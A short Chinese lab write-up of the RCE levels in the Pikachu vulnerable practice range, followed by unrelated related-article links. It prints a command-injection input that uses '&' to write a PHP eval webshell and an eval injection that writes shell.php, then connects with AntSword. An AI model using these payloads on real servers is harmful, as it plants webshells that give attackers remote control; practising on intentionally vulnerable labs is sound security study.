Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
永不停歇的蜗牛5 小时前
Maven的POM文件相关标签作用
服务器·前端·maven
爱吃萝卜的美羊羊5 小时前
ubuntu下国内升级ollama
linux·运维·ubuntu
Erwin Rommel5595 小时前
nginx的https服务搭建实验
服务器·nginx·https
mzhan0175 小时前
Linux: console: printk: console_no_auto_verbose
linux·运维·服务器
用什么都重名5 小时前
Docker 镜像源配置指南
运维·docker·容器
河南博为智能科技有限公司5 小时前
高集成度国产八串口联网服务器:工业级多设备联网解决方案
大数据·运维·服务器·数据库·人工智能·物联网
Savvy..5 小时前
天机学堂-Day01
linux·服务器·网络
忙里偷闲学python5 小时前
containerd_buildkitd构建镜像,告别docker构建
运维·docker·容器
liweiweili1267 小时前
Linux 中替换某个目录下所有文件中的特定字符串
linux·运维·服务器
wanhengidc7 小时前
云手机 多端互通 科技
运维·服务器·科技·游戏·智能手机